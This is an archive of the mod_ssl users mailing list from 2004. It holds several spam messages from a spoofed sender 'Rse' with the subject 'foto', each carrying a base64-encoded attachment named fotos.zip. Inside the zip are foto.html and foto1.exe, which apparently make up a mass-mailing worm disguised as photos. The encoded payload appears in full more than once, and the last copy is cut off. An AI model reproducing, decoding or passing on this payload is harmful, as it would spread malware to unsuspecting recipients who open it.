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
AA==

----------nonsrvbfhawyomuhwaze--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 22:08:35 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 28133A8A81; Tue, 31 Aug 2004 22:08:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xpw-llambert.net (pcp08362819pcs.lndsd201.pa.comcast.net [69.136.75.200])
	by master.modssl.org (Postfix) with SMTP id DD42FA8A79
	for ; Tue, 31 Aug 2004 22:08:30 +0200 (CEST)
Date: Tue, 31 Aug 2004 16:08:35 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------bdhbcmdmjjjjpyrwucdn"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------bdhbcmdmjjjjpyrwucdn
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------bdhbcmdmjjjjpyrwucdn
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
AA==

----------bdhbcmdmjjjjpyrwucdn--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 31 22:16:52 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 50523A8978; Tue, 31 Aug 2004 22:16:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nt_alex.com (200-101-235-134.fnsce7005.e.brasiltelecom.net.br [200.101.235.134])
	by master.modssl.org (Postfix) with SMTP id 64839A8963
	for ; Tue, 31 Aug 2004 22:16:48 +0200 (CEST)
Date: Tue, 31 Aug 2004 17:19:12 -0300
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------jkygnmuitjtfsrglstpt"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------jkygnmuitjtfsrglstpt
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------jkygnmuitjtfsrglstpt
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

UEsDBAoAAAAAAKGEITEAAAAAAAAAAAAAAAAFAAAAZm90by9QSwMEFAAAAAgAAI8hMR9CJh4i
AgAAYwQAAA4AAABmb3RvL2ZvdG8uaHRtbI1UUY+aQBB+v+T+wx4Ph+YKHNr0TA9MLFJj43HN
qfWxWWFYtsGFLKOeafzvXZBei5KmG0LYmfm+b2aYXScBGg2vr5wilDxHklLBtpSBq32hOzqv
jJry76gk8Ao5xcTV4wwzq3zZprLpjwpunfAqUm3m3sv064LMRsFkOZr451zOjWGcGNeCbsAV
dMcZxUyaNM8DZVGEsAeMERlxiYaSxQcWRTFjmnIlMTuwpPLAXgJKPFRP6atIdyDdnMoCpgI7
DfJvIAueie5jmWa8FSGqHeGiQJqmnS75eX1F6sVj0iF/wHlKMc7khtzetllvXKKvuOj3dNJg
+b3SLKSllilBYULo6MHzYjUN+r3V6CWYBhMzwU2ql4mdQ1WFWyn+chybSVY9JK5K4ImHMiuy
GIkqHKQAJP5rnmYSpF7mXTaGDF3Sa00xysLtBgSae8lRJehk6x8QIuGRqzG+1sieR+rn2yQB
